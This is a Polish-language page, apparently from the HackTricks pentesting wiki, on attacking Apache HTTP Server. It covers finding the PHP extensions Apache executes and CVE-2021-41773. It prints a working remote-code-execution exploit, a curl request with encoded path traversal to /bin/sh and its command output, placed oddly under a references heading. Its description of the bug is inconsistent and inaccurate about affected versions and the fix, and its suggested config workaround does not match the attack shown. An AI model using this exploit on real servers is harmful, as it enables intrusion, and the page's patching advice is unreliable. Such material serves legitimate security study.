Apache

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Wykonywalne rozszerzenia PHP

Sprawdź, które rozszerzenia wykonuje serwer Apache. Aby je wyszukać, możesz wykonać:

grep -R -B1 "httpd-php" /etc/apache2

Również, niektóre miejsca, gdzie można znaleźć tę konfigurację to:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

Opis

CVE-2021-41773 to podatność w serwerze Apache HTTP Server, która umożliwia zdalne wykonanie kodu. Podatność ta została odkryta we wrześniu 2021 roku i dotyczy wersji Apache 2.4.49 i wcześniejszych.

Wykorzystanie

Atakujący może wykorzystać tę podatność, wysyłając specjalnie spreparowane żądanie HTTP GET do serwera Apache. W wyniku tego serwer może ujawnić zawartość dowolnego pliku na systemie, do którego ma dostęp użytkownik, który uruchamia serwer Apache.

Naprawa

Aby naprawić tę podatność, należy zaktualizować serwer Apache do wersji 2.4.50 lub nowszej. W przypadku niemożności aktualizacji, można zastosować tymczasowe rozwiązanie, polegające na dodaniu reguły do pliku konfiguracyjnego serwera, która blokuje dostęp do niebezpiecznych ścieżek.

<DirectoryMatch "^/.*/\..*">
    Require all denied
</DirectoryMatch>

Referencje

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated